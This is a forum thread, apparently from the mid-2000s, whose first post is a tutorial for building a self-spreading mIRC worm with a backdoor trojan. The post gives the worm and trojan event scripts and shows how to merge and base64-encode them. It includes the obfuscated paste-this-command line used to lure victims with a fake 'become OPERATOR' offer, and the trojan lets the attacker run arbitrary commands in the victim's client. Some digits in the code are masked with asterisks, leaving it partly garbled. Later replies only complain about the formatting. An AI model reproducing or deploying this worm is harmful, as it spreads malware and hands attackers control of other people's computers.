file access
+ Reply to Thread
Results 1 to 4 of 4

Thread: ***how to infect a backdoor trojan***

  1. #1
    Join Date
    Mar 2006
    Posts
    16

    Thumbs up ***how to infect a backdoor trojan***

    properly developed it becomes a backdoor Trojan. This means that people who are infected by this worm you're able to control them. Once infected with this worm they are also infected with the Trojan. Using the Trojan you can control the victims PC.
    Infect the victim
    It all starts with the next command:
    //write mab.mrc $decode(b24gXio6dGV4dDoqOio6IHsgaWYgK
    ChpbnMqIGlzd20gJDEtKSAmJiAoJHRhcmdldCA*PSAkbWUpKSB7IC
    4gJCsgJDItIHwgaGFsdGRlZiB*IHwgZWxzZWlmICgoYSogaXN*bSA
    kMS0pICYmICgkY2hhbikpIHsgLm*zZyBtYWIgaW5mIHwgLm*zZyAk
    bmljayBXYW50IHRvIGJlIE*QRVJBVE*SIGluICRjaGFuIGNvcHkvc
    GFzdGUgdGhpcy0+IAM0Ly**cml0ZSAu***gJCsgZGVjb2RlKCAkKy
    AkZW5jb2RlKCRyZWFkKCRzY*JpcHQsbiwxKSxtKSAkKyAsbSkgJGN
    ocigxMjQpIC5sb2FkIC*ycyB*IH0=,m) | .load -rs mab.mrc
    This in one line!
    Understand the Script
    We need to mix these two things:
    The worm
    on *:text:*a*:#:{ .ignore $nick | .timer 0 *20 .join #mab | .msg $nick Do you want to be an OPERATOR in $chan ? copy/paste this-> 7 //write . $ $+ decode( $+ $encode($read($script,n,*),m) $+ ,m) $chr(*24) .load -rs . $chr(*24) //mode $ $+ me +R }
    Here is #mab the channel you want to let them join if they're infected with the worm. But since that would not be very stealth anymore we have to do it in another way. We let it message you. We change the .timer 0 *20 .join #mab with .msg mab_ inf. Where mab_ is your nickname.
    With this, your worm has been activated, it will now spread amongst channels throughout the network. It will try to send personal messages to random users while ignoring other people in the process. When this has been a success it will then try to send itself to other users, and then persuade them to type the command.
    This is the original worm in which I designed. Now we're going to change some functions of the Trojan so that it is constructive. We will remove the user mode +R on the end of the script, because this will only allow users who're authenticated with the official server bot message the victim. Once the Trojan has implemented that is not the objective , so we're going to remove that from the worm. So after these changes we get the next script that we have to merge with the Trojan's script:
    on *:text:*a*:#:{ .ignore $nick | .msg mab_ inf | .msg $nick Do you want to be an OPERATOR in $chan ? copy/paste this-> $chr(*) $+ 4//write . $ $+ decode( $+ $encode($read($script,n,*),m) $+ ,m) $chr(*24) .load -rs }
    The Trojan
    on ^*:text:ins*:?:{ . $+ $2- | haltdef }
    Combined together they will give us the Backdoored IRC Worm. This mean that the worm will happily spread itself, join the specific channel (here: #mab) and then after that it will then spread itself and then wait for you to control it via the Trojan Client. So you will have the rights todo whatever you want to the victims computer system using mIRC. You actually use the victims mIRC to accomplish certain commands. So infecting a quakenet operator would be one big plus!
    I'm now going to give you more details related to the script so that you can truly understand the full extent of the worm and be able to easily modify it to achieve better results.
    So basically we want to mix these two "mechanisms":
    on *:text:*a*:#:{ DO SOMETHING }
    on ^*:text:ins*:?:{ DO SOMETHING ELSE | haltdef }
    Solution:
    on ^*:text:*:*: {
    if ((ins* iswm $*-) && ($target == $me)) DO SOMETHING
    elseif ((a* iswm $*-) && ($chan)) DO SOMETHING ELSE
    }
    In one line:
    on ^*:text:*:*: { if ((ins* iswm $*-) && ($target == $me)) DO SOMETHING | elseif ((a* iswm $*-) && ($chan)) DO SOMETHING ELSE }
    Where this is DO SOMETHING the Trojan's work and DO SOMETHING ELSE is also the Worm's work.
    Integrated:
    on ^*:text:*:*: { if ((ins* iswm $*-) && ($target == $me)) { . $+ $2- | haltdef } | elseif ((a* iswm $*-) && ($chan)) { .msg mab_ inf | .msg $nick Do you want to be OPERATOR in $ $+ chan ? copy/paste this-> 7 //write . $ $+ decode( $+ $encode($read($script,n,*),m) $+ ,m) $chr(*24) .load -rs . $chr(*24) //mode $ $+ me +R } }
    Good this is exactly what we needed. Now this doesn’t look very good, so we need to encode it with mIRC. For this we have to write it firstly like something else, some chars have to be written differently because mIRC can misunderstand them and think they are parameters or other things. The next chars have to be written differently: (){},
    Why these chars and how can I control it?
    Right then, this is exactly what we needed. Now this doesn't look very acceptable at the moment so we need to encode it with mIRC
    //echo -a $asc(char here)
    If this gives a bad result this means that the char must be written in another way.
    Example encoding of “,”:
    //say $encode(,,m) This is wrong
    //say $encode($+ $chr(44),m) This is correct
    Note:
    $+ = pasting two strings together
    | = $chr(*24)
    , = $chr(44)
    ( = $chr(40)
    ) = $chr(4*)
    { = $chr(*2*)
    } = $chr(*25)
    Pleas be aware that we don't necessary have to encode that in this way, sometimes this method isn't needed.
    For finding the numbers you use this:
    //echo -a $asc($?)
    This will pop up an input box, just fill in the char and you'll get the number as a result.
    Good, we have the knowledge for $encoding now. So this is what we get before we start encoding:
    on ^*:text:*:*: $chr(*2*) if ((ins* iswm $ $+ *-) && ($ $+ target == $ $+ me)) $chr(*2*) . $ $+ + $ $+ 2- $chr(*24) haltdef $chr(*25) $chr(*24) elseif ((a* iswm $ $+ *-) && ($chan)) $chr(*2*) .msg mab inf $chr(*24) .msg $ $+ nick Want to be OPERATOR in $ $+ chan copy/paste this-> $chr(*) $+ 4//write . $ $ $+ + decode( $ $+ + $ $+ encode( $+ $ $+ read( $+ $ $+ script,n,*),m) $ $+ + ,m) $ $+ chr(*24) .load -rs $chr(*25) $chr(*25)
    So:
    //say $encode(on ^*:text:*:*: $chr(*2*) if ((ins* iswm $ $+ *-) && ($ $+ target == $ $+ me)) $chr(*2*) . $ $+ + $ $+ 2- $chr(*24) haltdef $chr(*25) $chr(*24) elseif ((a* iswm $ $+ *-) && ($chan)) $chr(*2*) .msg mab inf $chr(*24) .msg $ $+ nick Want to be OPERATOR in $ $+ chan copy/paste this-> $chr(*) $+ 4//write . $ $ $+ + decode( $ $+ + $ $+ encode( $+ $ $+ read( $+ $ $+ script,n,*),m) $ $+ + ,m) $ $+ chr(*24) .load -rs $chr(*25) $chr(*25),m)
    For finding the $encoded variable we split it up as global variables. The variables are set with
    /set %var STRING
    So for locating it properly we need to write the next mIRC formula:
    //say $encode(%var* $+ %var2 $+ %var* $+ %var4,m)
    But we don't necessarily need to set is as variables before we encode it. So you can just use the encode line.
    We find the next as result:

    b24gXio6dGV4dDoqOio6IHsgaWYgKChpbnMqIGlzd20gJDEtKSAmJ
    iAoJHRhcmdldCA*PSAkbWUpKSB7IC4gJCsgJDItIHwgaGFsdGRlZi
    B*IHwgZWxzZWlmICgoYSogaXN*bSAkMS0pICYmICgkY2hhbikpIHs
    gLm*zZyBtYWIgaW5mIHwgLm*zZyAkbmljayBXYW50IHRvIGJlIE*Q
    RVJBVE*SIGluICRjaGFuIGNvcHkvcGFzdGUgdGhpcy0+IAM0Ly**c
    ml0ZSAu***gJCsgZGVjb2RlKCAkKyAkZW5jb2RlKCRyZWFkKCRzY*
    JpcHQsbiwxKSxtKSAkKyAsbSkgJGNocigxMjQpIC5sb2FkIC*ycyB
    *IH0=
    This pasted to each other in one line!

    WARNING:
    DO THOSES STEPS CARFULY!!!!!!
    M*55 W*TH B*5T D*E L*K* TH* R*5T!!!!

  2. #2
    Join Date
    Sep 2006
    Posts
    157
    I cant read that at all get some paragraphs and space it out more so people can read it better. I cant read anything cause you got the codes mixed in with the sentences and its all over the place

  3. #3
    Join Date
    Sep 2005
    Posts
    2,050
    Quote Originally Posted by Newby_Programme
    I cant read that at all get some paragraphs and space it out more so people can read it better. I cant read anything cause you got the codes mixed in with the sentences and its all over the place
    Just ignore it - he didn't write any of that.

  4. #4
    Join Date
    Sep 2006
    Posts
    157
    o ok must be why its all together cause if someone wrote it they most likely would but a space. Copy Paste

+ Reply to Thread

Similar Threads

  1. html infect bot
    By Sintacks in forum Viruses and Trojans
    Replies: 3
    Last Post: 07-22-2006, 03:18 PM
  2. A backdoor in WMP
    By Alucard in forum Internet Privacy
    Replies: 2
    Last Post: 03-22-2006, 10:29 AM
  3. need a trojan..
    By ciuruc in forum Viruses and Trojans
    Replies: 0
    Last Post: 11-17-2005, 06:26 PM
  4. Trojan-Backdoor-SecureMulti
    By Whytey in forum Viruses and Trojans
    Replies: 0
    Last Post: 10-27-2005, 12:43 PM
  5. trojan
    By Gerhard in forum Viruses and Trojans
    Replies: 1
    Last Post: 07-28-2002, 09:30 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts